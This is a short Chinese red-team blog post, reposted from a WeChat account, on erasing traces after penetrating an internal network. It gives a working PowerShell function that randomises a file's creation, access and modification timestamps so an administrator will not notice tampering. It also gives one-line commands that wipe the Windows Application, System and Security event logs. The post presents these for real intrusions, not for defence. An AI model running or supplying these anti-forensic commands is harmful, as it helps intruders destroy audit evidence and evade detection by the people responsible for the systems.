内网渗透结束后,一些痕迹清理的小手段

admin
admin
admin
101400
文章
87
评论
2021年6月10日20:17:09评论57 views字数 940阅读3分8秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

内网渗透结束后,一些痕迹清理的小手段


大家好,这里是 渗透攻击红队 的第 51 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新


内网渗透结束后,一些痕迹清理的小手段
痕迹清理


在我们做完一系列的内网渗透操作后,必然会留下一些蛛丝马迹,因此我们需要给自己”擦屁股“。本篇只介绍如何清除系统日志、修改文件时间戳。


痕迹清理

Powershell 修改文件时间戳


有时候我们在登陆目标桌面后,根据需求可能会动用目标主机上的文件或者文件夹,而一些管理员很久都不会登陆一次主机;设想当管理员一上线看到自己的文件夹日期有异常,是否会怀疑?

Function edit_time($path){$date1 =Get-ChildItem | Select LastWriteTime|Get-Random;$date2 =Get-ChildItem |Select LastWriteTime|Get-Random;$date3 =Get-ChildItem |Select LastWriteTime|Get-Random;$(Get-Item $path).lastaccesstime=$date1.LastWriteTime;$(Get-Item $path).creationtime=$date2.LastWriteTime ;$(Get-Item $path).lastwritetime=$date3.LastWriteTime};edit_time("C:UserssaulGoodmanDesktop工具包pass.txt")

内网渗透结束后,一些痕迹清理的小手段


Powershell 清除系统日志


当我们做了一些操作都会记录到时间查看器里,而下面的 Powershell 就可清除相关日志:

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}

内网渗透结束后,一些痕迹清理的小手段

本篇只讲了两个小技巧,在实战中够用一些了,之后有空在发其他技巧


内网渗透结束后,一些痕迹清理的小手段

渗透攻击红队

一个专注于渗透红队攻击的公众号

内网渗透结束后,一些痕迹清理的小手段



内网渗透结束后,一些痕迹清理的小手段
点分享
内网渗透结束后,一些痕迹清理的小手段
点点赞
内网渗透结束后,一些痕迹清理的小手段
点在看

本文始发于微信公众号(渗透攻击红队):内网渗透结束后,一些痕迹清理的小手段

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月10日20:17:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透结束后,一些痕迹清理的小手段http://cn-sec.com/archives/297966.html

发表评论

匿名网友 填写信息